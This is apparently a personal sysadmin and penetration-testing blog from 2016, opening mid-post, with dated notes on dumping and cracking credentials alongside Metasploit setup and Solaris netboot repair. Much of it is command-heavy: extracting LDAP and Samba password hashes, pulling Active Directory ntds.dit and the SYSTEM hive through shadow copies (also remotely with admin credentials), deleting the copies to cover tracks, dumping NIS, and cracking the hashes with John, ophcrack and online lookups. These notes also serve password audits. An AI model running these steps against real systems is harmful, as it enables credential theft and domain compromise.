but.
if your passwords are crypt...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w badpassword \
-h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" \
-LLL -v "" uid userPassword \
| ldap2pw > ldap.pw
....
#! /usr/bin/perl -w
use strict;
use MIME::Base64;
while( <> && ! eof) { # need eof since we will hit eof on the other <> chomp;
my( $uid, $passw, $cn, $dn );
$cn = $uid = '';
while( <> ) { # get an object
chomp;
last if /^\s*$/; # object have blank lines between then
if( /^cn: (.+)/ ) {
$cn = $1;
} elsif( /^dn: (.+)/ ) {
$dn = $1;
} elsif( /^userP\w+:: (.+)/) {
$passw = substr( decode_base64($1), 7); # assuming {crypt}
} elsif( /^uid: (.+)/) {
$uid = $1;
}
}
print "$uid\:$passw\n" if defined $passw; # only output if object has password
}
...
fun.
Monday, October 31, 2016
LDAP crypt password extraction
LDAP base64 conversion for cracking
ldif and ldap password extraction
when you extract passwords from ldap, they're salted.
you need to convert them to their hashes.
why? well. because of RFC2307
userpasswordvalue = cleartext-password / prefix b64-hashandsalt
prefix = "{" scheme "}"
scheme = %x30-39 / %x41-5A / %x61-7a / %x2D-2F / %x5F
;0-9, A-Z, a-z, "-", ".", "/", or "_"
b64-hashandsalt = <base64 of hashandsalt>
hashandsalt = password-hash salt
password-hash = <digest of cleartext-password salt>
cleartext-password = %x00-FF
salt = %x00-FF
yes. that.
in a previous post i've already mentioned how to extract uids
and passwords into a nice long list for jtr...
you'll need python and the script below which will convert the list
line by line. it'll work for base64 passwords:
MD5, SHA, SHA1, SSHA, SHA256, SSHA256, &c.
first, do some text preparation:
# cut -d ":" -f1 userpassword.out > userpassword.left
# cut -d ":" -f2 userpassword.out > userpassword.base64
..................
#!/usr/bin/python
# base64tohex.py
import binascii
import base64
import sys
f=open(sys.argv[1],"r")
#read in lines - and decode
for x in f.xreadlines():
x=x.rstrip('\n')
try:
print binascii.hexlify(base64.b64decode(x))
except:
print "Error: "+x
..................
# ./base64tohex.py userpassword.base64 > userpassword.right
# paste -d : userpassword.left userpassword.right > userpassword.out
and if you can't figure out what is want in terms of hashes, use hash-identifier for singletons.
use hashid for lists.
# hashid userpassword.right -o userpassword.hashid
after base64 conversion, of course.
Wednesday, October 26, 2016
LDAP attributes for password extraction
for ldap attribute extraction the following are key:
Filter: (objectClass=*)
Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword
i have access to an openldap server. yes!
the search DN is:
dc=my,dc=pants,dc=com
valid user accounts are kept:
ou=users,DN
retired user accounts are kept:
ou=yawn,DN
let's grab passwords...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword /
-h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" -LLL /
-v "(objectClass=*)" sambaLMPassword > lmpassword
i know that all valid accounts have this format:
dn: uid=username
some places have a different dn: than the valid logon id.
those can be simply the attribute uid=username
my script below is to slice and dice "dn: uid="
when doing the ldap dump, however, attributes may be juggled. more advanced
text sorting is required for proper formatting... i digress.
#!/bin/bash
dumporig=userpassword
dump=userpassword.sed
cp $lmorig $lm
cp $lmorig $lm
sed -i '/ou=groups/d' $dump <-- remove groups as dumped
sed -i '/sambaDomainName/d' $dump <-- there are no passes for me here
sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump <-- admin has cn: as do others
sed -i '/^$/d' $dump <-- blank lines be gone
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn
sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump <-- removing dangling dn
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn
sed -i 's/,dc=my,dc=pants,dc=com//g' $dump <-- removing dangling dn
sed -i '/dc=my/d' $dump <-- removing dangling dn
sed -i 's/dn:\ uid=//g' $dump <-- we only want uid
sed -i '/dn:\ /d' $dump <-- for records that only have leadinf dn:
sed -i ':a;N;$!ba;s/\n/blast/g' $dump <-- fun with line breaks
sed -i 's/userPassword::/userPassword:/g' $dump <-- converting attribite. some are :: others :
sed -i 's/userPassword//g' $dump <-- remove the strip altgother. once : remains
sed -i 's/blast:\ /:/g' $dump <-- fun
sed -i 's/blast/\n/g' $dump <-- convert fun to a new line
sed -i '/:/!d' $dump <-- no : ? go away
sed -i '/^:/d' $dump <-- start with : ? go away
sed -i 's/=//g' $dump <-- remove trailing =
sort -u $dump > $dump.out <-- sort the output
rm $dump <-- remove temp file
#!/bin/bash
dumporig=lmpassword
dump=lmpassword.sed
cp $dumporig $dump
sed -i '/ou=groups/d' $dump
sed -i '/sambaDomainName/d' $dump
sed -i '/dn:\ cn=/d' $dump
sed -i '/^$/d' $dump
sed -i '/^uid:\ /d' $dump <-- removing uid if we dumped it
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump
sed -i '/dc=my/d' $dump
sed -i 's/dn:\ uid=//g' $dump
sed -i ':a;N;$!ba;s/\n/blast/g' $dump
sed -i 's/sambaLMPassword//g' $dump
sed -i 's/blast:\ /:/g' $dump
sed -i 's/blast/\n/g' $dump
sed -i '/:/!d' $dump
sort -u $dump > $dump.out
rm $dump
but... what is rootdn's password for to access the openldap server?
it is found here:
/etc/ldap/slapd.conf
scroll down to:
rootdn
another account worth checking is replicator, but
it may be restricted to certain hosts.
rootdn "cn=admin,dc=my,dc=pants,dc=com"
moduleload syncprov.la
overlay syncprov
syncprov-checkpoint 100 10
syncprov-sessionlog 100
rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p
crack that password by placing the following in a text file, say slap.out:
rootpw:{SSHA}VDE302qCXhD2yqF/woV4XI5hAcS1ds6p
/opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out
* note: --format=salted-sha1-opencl may barf:
Build log: ptxas error : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)
it is only one password...
if you are are able to grab an ldif, things are way easier.
sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out
this has you searching for the strings "dn:" and "Password" and printing their lines out in that
order to an output file.
easy. then you parse away.
password cracking post john
post dsusers.py and john...
let's say you've cracked away and can't crack the hash.
someone may already have for you.
findmyhash is an automated way to search online databases:
# findmyhash TYPE -h "hash" -g (searches the Google)
Do a batch job because you don't want to copy and paste
your life away (no Google, sorry):
# findmyhash TYPE -f FILE
...
that's useful, but doing things with a file is the way to go.
here's how to create a file with post-cracked john LANMAN
passes... the below shows what's left, does some formatting,
removes the first couple of fields, and dumps the type of password.
# john --show=LEFT --format=lm lmhash.out | grep -v "password hashes" | \
cut -d":" -f3 | sort -u > lmhash.only && sed -i 's/\$LM\$//g' lmhash.only
however, the findmyhash man pages state that for LANMAN/NT hashes
having both hashes is best. dsusers.py ohpc format does this for us...
ophcrack files are formatted thus:
uid::lmhash:nthash:sid::
1 23 4 5 67
we want columns 3 and 4.
note: not all active directory accounts have a stored LANMAN password. crud.
that's why we're using sed to remove the leading : . joy.
# cat nthash.oph | cut -d":" -f3,4 | sort -u > nthash.only && sed -i 's/^://' nthash.only
now plug it in:
# findmyhash LM -f nthash.only
yay! our passwords are all over the internets. who knew?
..
a cracking interlude...
passwords found in LDAP databases can be challenging.
Type can be any number of type: MD5, CRYPT, DES, NT, LANMAN
gross. just gross. but... if the passwords you're accessing are
from an LDAP-Samba database, get at one of those passwords and
you're golden. figuring out the hash type can be challenging.
hash-identifier may be of use.
# hash-identifier
place hash on HASH: line
and then you can use the same format as above with findmyhash.
only, specify MD5, CRYPT...
Monday, October 24, 2016
ophcrack and jtr coexisting notes
when using ophcrack and dsusers.py do not specify lmhash as dsusers.py will
place the lmhashes and nthashes in the same file for use by ophcrack.
python ~/ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.4 ~/temp \
--passwordhistory --passwordhashes --ntoutfile ~/domain.oph/domain-nthash.oph --pwdformat ophc --syshive ~/broadway/system
when running ophcrack via a cracking rig, here's the format:
# ophcrack -v -g -u -n 7 -l ~/oph/domain-nthash.log -o ~/oph/domain-nthash.cracked -d /usr/share/ophcrack/ \
-t vista_free:vista_proba_free:xp_free_fast:xp_german:vista_num:vista_special:xp_free_small \
-f ~/oph/domain-nthash.oph
-l log of work
-o cracked passwords. this is basically the oph file with the lanman and nt passes appended at the end.
-d location of rainbow tables
-t are the rainbow table directories
-f the oph hash file
let's say you've already run your grabbed hashes through john and want to crack the
leftovers via ophcrack.
# ./john --show=LEFT --format=nt nthash.out | grep -v "password hashes" | cut -d":" -f1,2 | \
sort -u > domain-nthash.sort && sed -i 's/:/::/g' domain-nthash.sort
# sort -u domain-nthash.oph > domain-nthash.oph-sort && mv domain-nthash.oph-sort domain-nthash.oph
# gawk -F:: '
FNR==NR {a[NR]=$1; next};
{b[$1]=$0}
END{for (i in a) if (a[i] in b) print b[a[i]]}
' domain-nthash.sort domain-nthash.oph | sort -u > domain-nthash.oph.sort-new && mv domain-nthash.oph
Friday, October 21, 2016
jtr and wordlists notes
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >> dictionaries/local-upper.lst
# cat local-upper.lst >> local.lst
if you're cracking des or nt or pretty much anything that is not solely uppercase
and want to eventually feed it into lm brute forcing:
# dd if=dictionaries/local.lst of=dictionaries/local-upper.lst conv=ucase
Thursday, October 20, 2016
dumping ad passwords and cracking with jtr
yes, some people use the euphemism "windows domain controller password audit." but, let's
call it what it is: dumping ad and getting password hashes. i'm using jtr.
........................................
on a domain Controller using a privileged account:
C:\ vssadmin list shadows
none. okay.
* where's ntds.dit ? take note.
C:\Windows\NTDS\ntds.dit
* make a system dir
C:\ mkdir C:\Windows\system
* make a shadow copy of C:\
* C:\ vssadmin create shadow /for=C:
you should see:
Successly create shadow for 'C:\'
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
* C:\Users\administrator>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}
Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: domain-dc1.domain
Service Machine: domain-dc1.domain
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers,
Differential
* next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.
that would be from the shadow volume NTDS location to, say, C:\
C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo
py1\Windows\NTDS\ntds.dit C:\
1 file(s) copied.
* copy SYSTEM hive
C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo
py1\Windows\System32\config\SYSTEM C:\
1 file(s) copied.
* let's cover our tracks and prevent others from grabbing dit and SYSTEM
C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250
........................................
a linux interlude... if you have admin creds
and do not have access to a console and do
not want to have access to a console
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# apt-get intall wmis
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
vssadmin list shadows > c:\output.txt"
# cat /root/mnt/output.txt
look for ShadowsCopy that is where you'll find ntds.dit and SYSTEM
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"
# ls /mnt
ntds.dit SYSTEM
........................................
linux ubuntu/debian rig
install base packages:
# apt-get install cifs-utils autoconf automake autopoint libtool pkg-config
offline processing tools:
libesedb
# git clone https://github.com/libyal/libesedb.git
# cd libesedb/
# ./synclibs.sh
# ./autogen.sh
# ./configure
# make && make install
# ldconfig <- load library
credump
# git clone https://github.com/moyix/creddump.git
ntdsextract
# get clone https://github.com/csababarta/ntdsxtract.git
get cracking!
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# mkdir domain
# cp /root/mnt/SYSTEM /root/mnt/ntds.dit /root/domain/
# cd ~/libesedb/esedbtools
# ./esedbexport -t ~/ntds ~/ntds.dit
# ~/libesedb/esedbtools# ./esedbexport -t ~/domain ~/domain/ntds.dit
esedbexport 20160924
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
# ls ~/domain.export
datatable.3 <- accounts
hiddentable.4
link_table.5 <- db links
MSysDefrag2.9
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer2.2
quota_rebuild_progress_table.11
quota_table.10
sdpropcounttable.6
sdproptable.7
sd_table.8
# python ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM
what does that mean?
command accounttable linkstable whereworkisdone wewantthemall wewanthashes wheretosendlmhash wheretosendnthash hashformat systemhive
[+] Started at: Thu, 20 Oct 2016 17:47:21 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: /root/domain/lmhash.out
[-] NT hash output filename: /root/domain/nthash.out
[-] Hash output format: john
The directory (/root/temp) specified does not exists!
Would you like to create it? [Y/N]
# ls ~/domain/
lmhash.out
nthash.out
* feed into jtr and use cracked passes to compose a wordlist suitable for nt format
# ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out
note: lm is not compatible with gpu cracking
# ./john --show lmhast.out
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt
# ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out
solaris 11 default passwords
from oracle support:
On Solaris 11 the default account for the system is (login/password): jack/jack and for the system account root/solaris ; please keep in mind that on Solaris 11 you can't longer login directly with the root account.
well. that's nice. that means jack, right?
Friday, October 14, 2016
dump and crack nis/nis+ password database
yeah well. that was easy.
# ypcat passwd > <file>
# john <file>
# john --show <file>
really.
Thursday, October 13, 2016
afterthefact postgre metasploit user password set
let's just say you set up metaspoit with msf user and forget to set the password.
you go to msfconsole and see:
Failed to connect to the database: fe_sendauth: no password supplied [-] Unknown command: Failed. metasploit
crap.
$ sudo -u postgres psql
\password msf
set the password and quit
\q
edit:
$ sudo nano -w /opt/metasploit-framework/config/database.yml
On the line password: supply it.
$ echo sigh.
let's crack default factory-shipped hp ilo passwords with john
let's crack default ipmi passwords from hp ilo.
yes let's, shall we?
doing simple alpha or num cracks.
yes let's, shall we?
# mkdir -p /opt/john/dictionaries
# cd /opt/john/dictionaries
# crunch 8 8 0123456789 > eightnum.lst <- 890M
# crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ > eightalpha.lst <- 1T
# ./john --session=ipmi32 --fork=8 --format=rakp \
--wordlist=/opt/john/dictionaries/eightnum.lst out.john
gross
# ls /opt/john/dictionaries/ | xargs -t -I files \
./john --session=ipmi32 --wordlist=/opt/john/dictionaries/files --rules \
--fork=8 --format=rakp out.john
now you can let it run against all the numbers and all the alpha.
--rules will do crazy upper and lower case (just in case).
doing simple alpha or num cracks.
go to /opt/john/john.conf and add the following stanza:
[Incremental:UpperEight]
File = $JOHN/upper.chr
MinLen = 8
MaxLen = 8
CharCount = 26
that uses john's uppercase alphabet chr and parses through all 8 combinations of 26 letters.
it may take forever, but, yay.
# ./john --fork=8 --incremental:UpperEight --format=rakp ./out.john
here's something for hp's default random 8 character string of 10 digits:
[Incremental:DigitsEight]
File = $JOHN/upper.chr
MinLen = 8
MaxLen = 8
CharCount = 10
# ./john --fork=8 --incremental:DigitsEight --format=rakp ./out.john
first, always check how many gpus you have available
# nvida-smi
0, 1 under the GPU heading means you have two.
when passing the command line options to john,
get cracking:
# ./john --session=ipmiopencl --format=rakp-opencl --dev=0,1 --fork=2 ./out.john
* this means you're calling on devices 0 & 1 (as noted in nvidia-smi) and you are
forking the cracking job between the two of them.
Using default input encoding: UTF-8
Loaded 245 password hashes with 245 different salts (RAKP-opencl, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 OpenCL])
Remaining 116 password hashes with 116 different salts
Node numbers 1-2 of 2 (fork)
Device 1@crackingrig: Quadro NVS 295
Device 0@crackingrig: Quadro NVS 295
Press 'q' or Ctrl-C to abort, almost any other key for status
* if you press <enter> <enter>
2 0g 0:00:00:28 3/3 0g/s 27871p/s 479640c/s 479640C/s GPU:81°C batash..maglor
1 0g 0:00:00:28 3/3 0g/s 26870p/s 475151c/s 475151C/s GPU:77°C 123456..anitie
you'll see something similar to the above. notice that the GPU is not frying.
* nb the idea of cores does not apply to gpus, so stick to fork=2 or you might
have a really bad day. really. pay no attention to --list=cuda-devices and seeing:
Number of stream processors: 8 (1 x 8)
and that thought that it means --fork=8 per processor.
here're some numbers to dissuade you for brute-force processing:
0 0 0g 0:00:00:03 57.52% 1/3 (ETA: 15:30:49) 0g/s 191006p/s 191006c/s 191006C/s GPU:77°C GPU1:81°C administrator10..A3212
2 1 0g 0:00:00:02 74.16% 1/3 (ETA: 15:27:49) 0g/s 194691p/s 194691c/s 194691C/s GPU:78°C a5668..admior5632
4 4 0g 0:00:00:06 99.38% 1/3 (ETA: 15:26:34) 0g/s 50777p/s 50777c/s 50777C/s GPU:87°C administr3..a971905
8 5 0g 0:00:00:03 58.41% 1/3 (ETA: 15:25:17) 0g/s 25871p/s 25871c/s 25871C/s GPU:79°C 5505..A9691
16 5 0g 0:00:00:10 51.33% 1/3 (ETA: 15:24:10) 0g/s 3556p/s 3556c/s 3556C/s GPU:80°C A-214..Administrtor214
Tuesday, October 11, 2016
soup to nuts install of metasploit on ubuntu 14.04 lts
soup to nuts install of metasploit on ubuntu 14.04 lts
..........
install base
* priv
passwd
nano -w /etc/ssh/sshd_config
ssh-keygen -t rsa -b 2048
apt-get update
apt-get upgrade
apt-get install build-essential libreadline-dev libssl-dev libpq5 \
libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre \
git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev \
libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ipmitool p7zip \
nmap tcpdump subversion cmake bison flex
..........
rbenv
* non-priv
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
rbenv install 2.3.1
rbenv global 2.3.1
ruby -v
..........
postgre sql server
* non-priv
sudo -s
su postgres
cd ~
createuser msf -P -S -R -D
createdb -O msf msf
exit
exit
..........
hashcat (not a hot idea on a virtual machine)
* as priv user
sudo apt-get install ocl-icd-libopencl1 opencl-headers clinfo
sudo mkdir /usr/bin/OpenCL
cd /opt
wget https://hashcat.net/files/hashcat-3.10.7z
p7zip -d hashcat-3.10.7z
mv hashcat-3.10/ hashcat
cd hashcat
cp hashcat64.bin /usr/bin
ln -s /usr/bin/hashcat64.bin /usr/bin/hashcat
..........
john
* as priv user
apt-get install build-essential libssl-dev yasm libgmp-dev \
libpcap-dev libnss3-dev libkrb5-dev pkg-config libbz2-dev \
nvidia-cuda-toolkit nvidia-opencl-dev nvidia-352 nvidia-cuda-toolkit opencl-headers <- if you have an nvidia gpu
fglrx-updates-dev <- if you want to use your amd gpu as an opencl device
libopenmpi-dev openmpi-bin <- for mpi support
* a gpu note
lshw -C video
rexgen
apt-get install libboost-regex1.54-dev <- meh
svn checkout https://github.com/teeshop/rexgen.git rexgen
cd rexgen/trunk/src/
mkdir build && cd build
cmake ..
make && sudo make install
ldconfig
git clone git://github.com/magnumripper/JohnTheRipper -b bleeding-jumbo john
cd john/src
./configure --enable-mpi --enable-nt-full-unicode && make -s clean && make -sj4
* because unicode, yes.
./configure --enable-cuda --enable-mpi --enable-nt-full-unicode \
--enable-experimental-code && make -s clean && make -sj4
* if gpu
cd .. && mv run /opt/john
** test gpu
john --list=cuda-devices
john --list=opencl-devices
let's get some password lists
cd /opt/john
mkdir /opt/john/dictionaries
cd /opt/john/dictionaries
cp .. /wordlist.lst .
wget http://download.openwall.net/pub/wordlists/all.gz .
wget https://download.g0tmi1k.com/wordlists/large/crackstation-human-only.txt.gz .
* nb crackstation may show up as a binary file. i'd suggest after extraction:
strings crackstation-human-only.lst > crackstation.txt
fix the environment
edit:
/etc/environment
add /opt/john to PATH
add line JOHN="/opt/john/"
** odds and sods
john --list=formats --format=opencl
john --list=formats --format=cuda
john ~/shadow <- openmp crack session
john --format=sha512crypt-opencl ~/shadow <- opencl session
john --format=sha512crypt-cuda ~/shadow <- cuda session
** add'l chr files
wget https://www.korelogic.com/Resources/Tools/rockyou.chr
wget https://www.korelogic.com/Resources/Tools/rockyou-lanman.chr
* nb http://contest-2010.korelogic.com/rules.html
..........
crunch
* priv user
wget https://sourceforge.net/projects/crunch-wordlist/files/latest/download -O crunch-3.6.tgz
tar xvfz crunch-3.6.tgz
make
make install
..........
metasploitframework
* non-priv
cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
sudo chown -R `whoami` /opt/metasploit-framework
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
..........
armitage (metasploit gui)
* priv
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver
sudo nano /opt/metasploit-framework/config/database.yml
production:
adapter: postgresql
database: msf
username: msf
password:
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5
sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
..........
run it
* non-priv
msfconsole
Thursday, October 6, 2016
remove solaris 8 jumpstart services from a solaris 8 jumpstart server
yucky gross solaris 8 jumpstart server begone!
# grep -v "^#" /etc/inetd.conf <- shows what is defined.
hashed finger, tftp, &c in /etc/inetd.conf
# pkill -HUP inetd
bash-2.03# rm /etc/ethers
bash-2.03# rm /etc/bootparams
bash-2.03# rm -rf /tftpboot
bash-2.03# rm -rf /jumpstart
# ptree
to determine if bootparamd is forked (saw entiries in rpcinfo -p)
443 /usr/sbin/rpc.bootparamd
441 /usr/sbin/in.rarpd -a
looked for rarp in /etc/rc2.d ... then all of /etc
# find . -type f -exec grep -l "rarp" {} +
found it... "*nfs.server"
hashed out rard & bootparamd lines
# If /tftpboot exists become a boot server
# if [ -d /tftpboot ]; then
# /usr/sbin/in.rarpd -a
# /usr/sbin/rpc.bootparamd
# fi
Monday, October 3, 2016
netboot solaris 10 via ubuntu 14 using RARP
I did something bad and my Sun T1000 decided to stop booting due to the most
recent patchset.
Luckily ALOM was installed and I could ssh in and see:
Cross trap sync timeout: at cpu_sync.xword[1]: 0x1010
Flow across the console.
This is firmware issue as:
sc> showhost
SPARC-Enterprise-T1000 System Firmware 6.3.10 2007/12/08 15:48
Host flash versions:
Hypervisor 1.3.4 2007/03/28 06:03
OBP 4.25.11 2007/12/07 23:44
POST 4.25.11 2007/12/08 00:10
The patchset is for 6.4. Of course.
Happily the T1000 lacks an optical drive nor any means of connecting one.
No USB either Great.
The next option was to do a network boot. Oh boy.
I didn't feel like messing with my production Solaris systems, so I installed Ubuntu 14
with all the preqs for an old-stype Jumpstart server:
* TFTP
* Bootparamd
* NFSv4
* RARP
* Solaris 10 SPARC DVD (here: /opt/sol-10-u9-sparc.iso)
* Solaris Firmware 6.7.13 patch 139435-10 (here: /opt/solaris10.patches/139435-10.zip)
The reason why I am doing RARP is due to the fact that my network already
has a DHCPvM$ server.
RARP uses reverse ARP to receive its IP address. So, by sending out RARP packets, my
Solaris system is able to get an address and not rely on DHCP. Neat? Yeah.
My systems for this exercise are:
netboot
10.97.32.186
hostnix01 10.97.32.166
0A6120A6 (IP as hex)
00:14:4f:e5:f7:9a
..........................................
netboot
..........................................
packages:
# apt-get install rarpd tftpd-hpa bootparamd nfs-kernel-server
rarpd:
# vi /etc/default/rarpd
Change the last line to match the tftpd-hpa directory and the NIC name:
OPTS="-v -b /var/lib/tftpboot/ eth0"
iso mount:
# mount -o loop /opt/sol-10-u9-sparc.iso /media/solaris10/
nfsd:
# mkdir -p /media/solaris10
# mkdir -p /opt/solaris10.patches
Define a share in NFS for this mount point as this mount will be used to serve
the patches. Open the following file:
# vi /etc/exports
Add the following entries:
/media/solaris10/ *(insecure,rw,no_root_squash,no_subtree_check,sync)
/opt/solaris10.patches/ *(insecure,rw,no_root_squash,no_subtree_check,sync)
bootparamd:
# vi /etc/bootparams
sunfire root=netboot:/media/solaris10/Solaris_10/Tools/Boot install=netboot:/media/solaris10 boottype=:in
per URL: Some explanation for the above: This defines which host gets the specified
NFS share. NFS4 uses relative pathnames, but I am not using this, so therefore I’ve
specified the absolute path. Note that server: is the hostname of the server running
the NFS service and was mentioned in my post earlier as my server is originally named
"netboot". The name used is the hostname of your server, substitute it to the correct name.
rarpd:
# vi /etc/hosts
Add the following entry:
10.97.32.166 hostnix01
Create the ethers file:
vi /etc/ethers
Add the following entry:
00:14:4f:e5:f7:9a hostnix01
per URL: Replace the MAC address with the MAC of your Sun server. You can change the
hostname as well, but needs to be the same everywhere!
tftpd:
vi /etc/default/tftpd-hpa
Change the TFTP_ADDRESS line to the following:
TFTP_ADDRESS=":69"
per URL: The configuration of the server is now complete One last step we need to do is
to copy the netboot kernel for the Sun server. This resides on the mounted Solaris
install image. By default OpenBoot will look for a kernel using TFTP when using network
boot. Based on it’s IP-address it will look for a matching HEX filename. We can find out
which filename that would be by running the following:
# printf "%02X%02X%02X%02X" 10 97 32 166
This will result in the following (for my IP-address):
0A6120A6
The above will be the netboot kernel for the Sun server. Place the netboot kernel in place:
# cp /media/solaris10/Solaris_10/Tools/Boot/platform/sun4u/inetboot /var/lib/tftpboot/C0A800E6
restart the services in order
service tftpd-hpa restart
service bootparamd restart
service nfs-kernel-server restart
service rarpd restart
..........................................
hostnix01
..........................................
# ssh admin@hostnix01-alom (remote management shell)
sc> poweron
sc> console -f
When you see mac address, get into openboot
#.
sc> break -y
Switch back to console and netboot the kernel
sc> console -f
ok > boot net:rarp -avs
* https://docs.oracle.com/cd/E19455-01/805-7228/hbsparcboot-60/index.html
* interactive, verbose, single user mode (does not include install flag)
After waiting next to forever...
# mkdir /tmp/mount
# mount -F nfs 10.97.32.186:/opt/solaris10.patches /tmp/mount
# cd /tmp/mount
# unzip 139435-10.zip
# cd 139435-10
# ./sysfwdownload /pwd/patch.bin
Run patching command via sysfwdownload. If you see:
"sysfwdownload: file could not be opened"
that means the installer requires the full path; e.g.:
/tmp/mount/139435-10/Firmware/SPARC_Enterprise_T1000/Sun_System_Firmware-6_7_13-SPARC_Enterprise_T1000.bin
# ./sysfwdownload Sun_System_Firmware-6_7_13-SPARC_Enterprise_T1000.bin
.......... (10%).......... (20%).......... (30%).......... (41%)..........
(51%).......... (61%).......... (71%).......... (82%).......... (92%)........ (100%)
Download completed successfully
# init 0
Now you should be back at the 'ok' prompt. Now on the ALOM:
sc> poweroff
SC Alert: SC Request to Power Off Host.
SC Alert: Host system has shut down.
sc> setkeyswitch -y normal
sc> flashupdate -s 127.0.0.1
sc> resetsc
Your ssh console will be terminated due to a broken pipe.
ssh back in and issue:
sc> poweron
sc> console -f
And you're back!
verify:
SPARC Enterprise T1000, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.30.4.e, 3968 MB memory available, Serial #82179994.
Ethernet address 0:14:4f:e5:f7:9a, Host ID: 84e5f79a.
Boot device: disk File and args:
ufs-file-system
Loading: /platform/SUNW,SPARC-Enterprise-T1000/boot_archive
